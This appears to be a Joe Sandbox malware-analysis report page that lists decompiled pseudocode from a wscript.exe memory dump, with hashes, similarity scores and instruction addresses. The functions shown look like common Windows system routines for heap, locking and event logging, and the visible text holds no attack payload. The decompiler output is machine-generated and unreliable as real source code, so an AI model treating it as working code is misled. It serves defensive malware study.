Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 6ef0c07f0127e67a576e92b13b18f2bd568015a748a0f0895cfe90ee5ab05d98
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 31112531205694CFFB22C768C658B793BEFFB417A8F0904A1DE0987693E76AD840D750

Uniqueness

Uniqueness Score: -1.00%

Function 0595766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0595766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0597F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0597F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L05964620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x05957672
0x0595767f
0x05957689
0x059576de
0x059576de
0x0595768b
0x05957691
0x05957693
0x05957697
0x00000000
0x05957699
0x059576a8
0x00000000
0x059576aa
0x059576ad
0x059576b1
0x00000000
0x059576b3
0x059576b3
0x059576b5
0x059576ba
0x059576bc
0x059576bc
0x059576c0
0x00000000
0x059576c2
0x059576ce
0x059576ce
0x059576c0
0x059576b1
0x059576a8
0x05957697
0x059576d9

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 674fd49895813ad46666f611e2f60290532873c9b84c0929a77bf198ebacfd63
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 3C01DF3230211DABC720DFAECC54E5B77ADFB84AF0B240525BD09DB244DA30EE2583A0

Uniqueness

Uniqueness Score: -1.00%

Function 059DC450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E059DC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E05989910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E059895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E059895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E059895D0();
				return L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x059dc458
0x059dc45d
0x059dc466
0x059dc468
0x059dc469
0x059dc46a
0x059dc46b
0x059dc46e
0x059dc46f
0x059dc471
0x059dc476
0x059dc476
0x059dc47c
0x059dc47e
0x059dc480
0x059dc480
0x059dc483
0x059dc484
0x059dc486
0x059dc488
0x059dc48f
0x059dc491
0x059dc493
0x059dc493
0x059dc48f
0x059dc498
0x059dc49e
0x059dc4ad
0x059dc4ad
0x059dc4b2
0x059dc4b4
0x059dc4cd

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 8009f1951f83dbf517c6a5cabfc8378c3f39ef0dc1aed81138bc475f6504134a
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: AD019E72240505BFD721AF65CC84E72F76EFF94394F008529F215429A0CB26BCA1CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 05949080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E05949080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x5a385ec;
				E05962280(_t48, 0x5a385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0595FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x5a3538c; // 0x2a8fbf8
					if( *_t84 != 0x5a35388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x5a1f6e8);
						E0599D0E8(0x5a385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E05A188F5(_t80, _t85, 0x5a35388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x5a386c0; // 0x2a707b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x5a386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E05962280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E05A188F5(0x5a385ec, _t85, 0x5a35388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0598AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x5a3b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x5a384c0;
																			if(_t82 >=  *0x5a384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05A19063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0594922A(_t99);
										_t64 = E05967D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05A18B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x5a386c0; // 0x2a707b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x5a386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x5a386bc;
													_t87 = 0x5a386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E05949240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x5a386c4;
												_t87 = 0x5a386c0;
												L27:
												E05979B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0599D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x5a35388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x5a3538c = _t51;
						goto L6;
					}
				}
			}

0x05949082
0x05949083
0x05949084
0x05949085
0x05949087
0x05949096
0x05949098
0x05949098
0x0594909e
0x059490a8
0x059490e7
0x059490e7
0x059490aa
0x059490b0
0x059490b7
0x059490bd
0x059490dd
0x059490e6
0x059490bf
0x059490bf
0x059490c7
0x059490cf
0x059490f1
0x059490f2
0x059490f4
0x059490f5
0x059490f6
0x059490f7
0x059490f8
0x059490f9
0x059490fa
0x059490fb
0x059490fc
0x059490fd
0x059490fe
0x059490ff
0x05949100
0x05949102
0x05949107
0x0594910c
0x05949110
0x05949113
0x05949115
0x05949136
0x0594913f
0x05949143
0x059a37e4
0x059a37e4
0x05949117
0x05949117
0x0594911d
0x00000000
0x0594911f
0x0594911f
0x05949125
0x00000000
0x05949127
0x0594912d
0x05949130
0x05949134
0x05949158
0x0594915d
0x05949161
0x05949168
0x059a3715
0x0594916e
0x0594916e
0x05949175
0x05949177
0x0594917e
0x0594917f
0x05949182
0x05949182
0x05949187
0x05949187
0x0594918a
0x0594918d
0x0594918f
0x05949192
0x05949195
0x05949198
0x05949198
0x05949198
0x0594919a
0x00000000
0x00000000
0x059a371f
0x059a3721
0x059a3727
0x059a372f
0x059a3733
0x059a3735
0x059a3738
0x059a373b
0x059a373d
0x059a3740
0x00000000
0x059a3746
0x059a3746
0x059a3749
0x00000000
0x059a374f
0x059a374f
0x059a3751
0x059a3757
0x059a3759
0x059a375c
0x059a375c
0x059a375e
0x059a375e
0x059a3761
0x059a3764
0x00000000
0x00000000
0x059a3766
0x059a3768
0x059a37a3
0x059a37a3
0x059a37a5
0x059a37a7
0x059a37ad
0x059a37b0
0x059a37b2
0x059a37bc
0x059a37c2
0x059a37c2
0x059a37b2
0x05949187
0x05949187
0x0594918a
0x0594918d
0x0594918f
0x05949192
0x05949195
0x00000000
0x05949195
0x00000000
0x059a376a
0x059a376a
0x059a376a
0x059a376c
0x059a376c
0x059a376f
0x059a3775
0x00000000
0x00000000
0x059a3777
0x059a3779
0x059a3782
0x059a3787
0x059a3789
0x059a3790
0x059a3790
0x059a378b
0x059a378b
0x059a378b
0x059a3792
0x059a3795
0x00000000
0x059a3795
0x00000000
0x059a3779
0x059a3798
0x00000000
0x059a3798
0x00000000
0x059a3768
0x059a379b
0x059a379b
0x059a3751
0x059a3749
0x00000000
0x059a3740
0x059491a0
0x059491a3
0x059491a9
0x059491b0
0x00000000
0x059491b0
0x05949187
0x059491b4
0x059491b4
0x059491bb
0x059491c0
0x059491c5
0x059491c7
0x059a37da
0x059491cd
0x059491cd
0x059491cd
0x059491d2
0x059491d5
0x05949239
0x05949239
0x059491d7
0x059491db
0x059491e1
0x059491e7
0x059491fd
0x05949203
0x0594921e
0x05949223
0x00000000
0x05949205
0x05949205
0x05949208
0x0594920c
0x05949214
0x05949214
0x0594920c
0x059491e9
0x059491e9
0x059491ee
0x059491f3
0x059491f3
0x059491f3
0x059491e7
0x00000000
0x00000000
0x00000000
0x05949134
0x05949125
0x0594911d
0x0594914e
0x059490d1
0x059490d1
0x059490d3
0x059490d6
0x059490d8
0x00000000
0x059490d8
0x059490cf

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24fd2095090263645c055312bc35c6e4663140f980d359e79dade532e16e59c
Instruction ID: c95d38e20bf355ba739aba9213139bb4d9c116e9f5ad9cf8face6093d35a6f82
Opcode Fuzzy Hash: d24fd2095090263645c055312bc35c6e4663140f980d359e79dade532e16e59c
Instruction Fuzzy Hash: AE01AFB2A166048FC7299F18E884F36BBFAFB85324F254166F5058B691D774EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05A14015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05A14015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E05962280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E05962280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x5a386ac);
					E0594F900(0x5a386d4, _t28);
					E0595FFB0(0x5a386ac, _t28, 0x5a386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0595FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x05a1401a
0x05a1401e
0x05a14023
0x05a14028
0x05a14029
0x05a1402b
0x05a1402f
0x05a14043
0x05a14046
0x05a14051
0x05a14057
0x05a1405f
0x05a14062
0x05a14067
0x05a1406f
0x05a1407c
0x05a1407c
0x05a1408c
0x05a1408c
0x05a14097

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75422ccef90bccee25fcbb21f16f9de96e7d0d733b81d5922a11abe080c5a459
Instruction ID: 0bfe24627e8492e0bb0fcf658a103d95d46e8bda4d2f155b482fcf9aebf84838
Opcode Fuzzy Hash: 75422ccef90bccee25fcbb21f16f9de96e7d0d733b81d5922a11abe080c5a459
Instruction Fuzzy Hash: 220184723015457FC711AB79CD84E17B7ACFB89764B000225F90883A11DB28FC15C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 05A014FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E05A014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x5a3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0598FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E05967D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0598B640(E05989AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x05a014fb
0x05a014fb
0x05a0150a
0x05a01514
0x05a01519
0x05a0151b
0x05a01526
0x05a0152c
0x05a01534
0x05a01537
0x05a0153a
0x05a01545
0x05a01557
0x05a01547
0x05a01550
0x05a01550
0x05a01562
0x05a01563
0x05a01565
0x05a0156a
0x05a0157f

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6f3542e73b22a105a540e67ab492f6e2047a5c78b6bc1685bf88fa45349df0
Instruction ID: e54d52cfb2d2d9c6bf665bac12986fe72291c165723c8f45b7c184e383d0e8ab
Opcode Fuzzy Hash: 6f6f3542e73b22a105a540e67ab492f6e2047a5c78b6bc1685bf88fa45349df0
Instruction Fuzzy Hash: 14019271A10248AFCB00EFA8D845EAEBBB8EF84714F004056F915EB280DA74EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05A0138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E05A0138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x5a3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0598FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E05967D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0598B640(E05989AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x05a0138a
0x05a0138a
0x05a01399
0x05a013a3
0x05a013a8
0x05a013aa
0x05a013b5
0x05a013bb
0x05a013c3
0x05a013c6
0x05a013c9
0x05a013d4
0x05a013e6
0x05a013d6
0x05a013df
0x05a013df
0x05a013f1
0x05a013f2
0x05a013f4
0x05a013f9
0x05a0140e

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0352d8f00972130b2eebbef65063f1fb1b41777da4151b04fd20773cb2aea9b9
Instruction ID: 90f2af0025c5be7367d14736cda75b79d24b701cd566fcd86136922e3cd50bc3
Opcode Fuzzy Hash: 0352d8f00972130b2eebbef65063f1fb1b41777da4151b04fd20773cb2aea9b9
Instruction Fuzzy Hash: 8B015671E14218AFDB14EFA9D885FAEB7B8EF44710F004056B905EB280D674EA01C795

Uniqueness

Uniqueness Score: -1.00%

Function 059458EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E059458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x5a3d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5925c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E05945943() != 0 &&  *0x5a35320 > 5) {
					E059C7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E059C7B5E( &_v28, _t28);
					_t11 = E059C7B9C(0x5a35320, 0x592bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0598B640(_t11, _t17, _v8 ^ _t29, 0x592bf15, _t27, _t28);
			}

0x059458fb
0x059458fe
0x05945906
0x0594590a
0x0594593c
0x0594593c
0x0594590c
0x0594590c
0x05945911
0x00000000
0x05945913
0x05945913
0x05945913
0x05945911
0x0594591d
0x059a1035
0x059a103c
0x059a103f
0x059a1056
0x059a1056
0x0594593b

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2a736e6f82df79bd6a602114580ec3ef5f9359ff1cb7702b855acb7168ab22
Instruction ID: 291355a24f38813936b095cd04e6d54f2b8cd32bb035cb997fbdb2b333fb8b37
Opcode Fuzzy Hash: 2a2a736e6f82df79bd6a602114580ec3ef5f9359ff1cb7702b855acb7168ab22
Instruction Fuzzy Hash: 8C018F31B181149BC714EBA9D855DBE7BBDEB84130F9600A9B806AB244DE30ED02CE91

Uniqueness

Uniqueness Score: -1.00%

Function 059FFEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E059FFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x5a3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0598FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E05967D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0598B640(E05989AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x059ffec0
0x059ffec0
0x059ffecf
0x059ffed9
0x059ffede
0x059ffee0
0x059ffeeb
0x059ffef3
0x059ffef6
0x059ffef9
0x059fff04
0x059fff16
0x059fff06
0x059fff0f
0x059fff0f
0x059fff21
0x059fff22
0x059fff24
0x059fff29
0x059fff3e

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a01e70151ec8e2fc01ae4ac302312d3496f97c1701684391a97e443de9cbf8
Instruction ID: 573489c069ad0aa5c054b55f653af715905ec6768276729ca3a3faba0d644d3a
Opcode Fuzzy Hash: 33a01e70151ec8e2fc01ae4ac302312d3496f97c1701684391a97e443de9cbf8
Instruction Fuzzy Hash: 98018871A00248ABD714EBA9D845FBEB7B8EF84710F404066B9019B290DA74E901C794

Uniqueness

Uniqueness Score: -1.00%

Function 059FFE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E059FFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x5a3d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0598FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E05967D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0598B640(E05989AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x059ffe3f
0x059ffe3f
0x059ffe4e
0x059ffe58
0x059ffe5d
0x059ffe5f
0x059ffe6a
0x059ffe72
0x059ffe75
0x059ffe78
0x059ffe83
0x059ffe95
0x059ffe85
0x059ffe8e
0x059ffe8e
